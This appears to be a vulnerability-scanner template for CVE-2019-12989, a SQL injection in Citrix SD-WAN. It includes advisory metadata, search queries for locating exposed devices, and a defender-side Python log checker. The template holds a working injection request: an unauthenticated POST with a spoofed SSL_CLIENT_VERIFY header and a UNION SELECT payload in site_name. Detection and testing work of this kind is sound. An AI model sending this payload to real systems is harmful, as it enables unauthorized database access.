Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in specific components, which could allow for execution of arbitrary SQL queries against the backend database. This could result in information disclosure, manipulation of data, or complete compromise of affected systems.
PoC code [publicly available]
id: CVE-2019-12989

info:
  name: Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in specific components, which could allow for execution of arbitrary SQL queries against the backend database. This could result in information disclosure, manipulation of data, or complete compromise of affected systems.
  impact: |
    Successful exploitation may allow a remote unauthenticated attacker to execute SQL commands on the system, potentially resulting in unauthorized access, data leakage, modification of critical data, or full compromise of the SD-WAN appliance.
  remediation: |
    Apply the vendor patch: upgrade Citrix SD-WAN to version 10.2.3 or later, and NetScaler SD-WAN to version 10.0.8 or later as detailed in the official Citrix advisory.
  reference:
    - http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.html
    - https://support.citrix.com/article/CTX251987
    - https://www.tenable.com/security/research/tra-2019-32
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12989
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-12989
    epss-score: 0.91054
    epss-percentile: 0.99619
    cwe-id: CWE-89
    cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: citrix
    product: netscaler_sd-wan
    fofa-query: (title="citrix sd-wan") && icon_hash="177980953"
    google-query: intitle:"citrix sd-wan"
  tags: cve,cve2019,citrix,sqli,kev,vkev

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        SSL_CLIENT_VERIFY: SUCCESS

        {"get_package_file": {"site_name": "test' union select md5({{num}}), 'x', 'y', 'z' #","appliance_type": "primary","package_type": "active"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "status\":\"fail", "Invalid value specified") && status_code == 400'
          - 'contains(body, "{{md5({{num}})}}") && status_code == 400'
        condition: or
# digest: 4a0a0047304502205a3597fee4808fc1e3718cacdb064e172654ff6f2ad76fb629b3aceaa9421c09022100f5a008a9577fe3a0cdc264fa7ada9c0b2222913f82dad131db95b76aa6fc4e5a:922c64590222798bb761d5b6d8e72950
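
A defender-side check for the request shape the template above sends, as an added example that is not part of the original template or of any Citrix code: it flags logged POSTs to the `get_package_file` endpoint that carry a client-supplied `SSL_CLIENT_VERIFY` header or a `site_name` outside an allow-list. The log record layout (`method`, `path`, `headers`, `body`), the allow-list pattern and the sample records are assumptions constructed for illustration.

```python
import json
import re

# Endpoint and header name taken from the template's request on this page.
TARGET_PATH = "/sdwan/nitro/v1/config/get_package_file"
SPOOFED_HEADER = "ssl_client_verify"
# Assumption: legitimate site names use only these characters.
SAFE_SITE_NAME = re.compile(r"[A-Za-z0-9_.\- ]{1,64}")


def inspect_request(record):
    """Return the reasons a logged request resembles the template's probe."""
    if record.get("method") != "POST":
        return []
    if record.get("path", "").split("?", 1)[0] != TARGET_PATH:
        return []
    reasons = []
    # Normalise header names so SSL-Client-Verify and SSL_CLIENT_VERIFY both match.
    headers = {k.lower().replace("-", "_"): v
               for k, v in record.get("headers", {}).items()}
    if SPOOFED_HEADER in headers:
        reasons.append("client-supplied SSL_CLIENT_VERIFY header")
    try:
        body = json.loads(record.get("body") or "{}")
    except json.JSONDecodeError:
        return reasons + ["unparseable JSON body"]
    params = body.get("get_package_file") if isinstance(body, dict) else None
    site_name = params.get("site_name") if isinstance(params, dict) else None
    # A missing, empty or non-string site_name is flagged as well.
    if not isinstance(site_name, str) or not SAFE_SITE_NAME.fullmatch(site_name):
        reasons.append("site_name outside allow-list")
    return reasons


# Constructed sample records (not captured traffic).
SAMPLE_LOG = [
    {"method": "POST", "path": TARGET_PATH + "?action=file_download",
     "headers": {"Content-Type": "application/json"},
     "body": '{"get_package_file": {"site_name": "branch-01", '
             '"appliance_type": "primary", "package_type": "active"}}'},
    {"method": "POST", "path": TARGET_PATH + "?action=file_download",
     "headers": {"SSL_CLIENT_VERIFY": "SUCCESS"},
     "body": '{"get_package_file": {"site_name": "a\' union select 1 #"}}'},
    {"method": "GET", "path": "/index.html", "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for rec in SAMPLE_LOG:
        print(rec["path"], inspect_request(rec))
```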